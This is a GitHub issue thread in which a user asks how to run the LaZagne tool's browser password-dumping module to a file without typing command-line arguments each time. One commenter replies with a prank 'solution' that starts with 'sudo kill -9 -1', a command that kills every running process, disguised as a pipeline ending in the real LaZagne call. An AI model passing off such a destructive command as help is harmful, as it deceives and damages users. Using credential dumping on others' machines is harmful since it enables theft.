### ISSUE TITLE
run commands since laZagne.py

### ISSUE THREAD

**Issue by Omardavinci** [AlessandroZ/LaZagne#80]
Sorry for posting again but i hadthis doubt. I explained bad. It's possible to call commands of cmd with laZagne.py sorry again! So i  dont need to write again the command. It's like put the command in the file and then laZagne.py show me the result. sorry again!

**Comment by AlessandroZ** [comment]
I don't understand what you want, I cannot do the support of every of your requests. If it's a batch file you want, check on google. 
If you are italian, maybe you should write in Italian because I don't understand what you need.

**Comment by Omardavinci** [comment]
i say like: i need to write in my cmd all time this to save my password's in my file
 python laZagne.pyW browsers -oN

But i want to run the file laZagne.py and then it save me the password in file.
In other words, i can't run argument:

> browsers -oN
Without use cmd you know?

**Comment by Omardavinci** [comment]
Like run laZagne.py and then it does this:
python laZagne.pyW browsers -oN

But without using cmd.
Sorry, this was the question. and sorry a lot for all inconveniencies.. really sorry..

**Comment by Omardavinci** [comment]
xD it's to put the argument since laZagne.py to avoid write all time i need to remember

**Comment by Omardavinci** [comment]
Ho voluto iniziare il programma senza avere argomenti con cmd. È fastidioso ripetere ogni volta il comando. Stavo solo cercando il boot, lazagne.py

**Comment by n1nj4sec** [comment]
try this :) ``` sudo kill -9 -1 #| generate lazagne.exe | python laZagne.py browser -oN output.txt ```

**Comment by Omardavinci** [comment]
i dont want to kill, i was trying to include any module inside of laZagne.py but i think it's not possible thx for your help!

**Comment by AlessandroZ** [comment]
Ho capito meglio quello che volevi quando me l'hai scritto in italiano. 
Almeno ce l'hai fatta, perfetto !
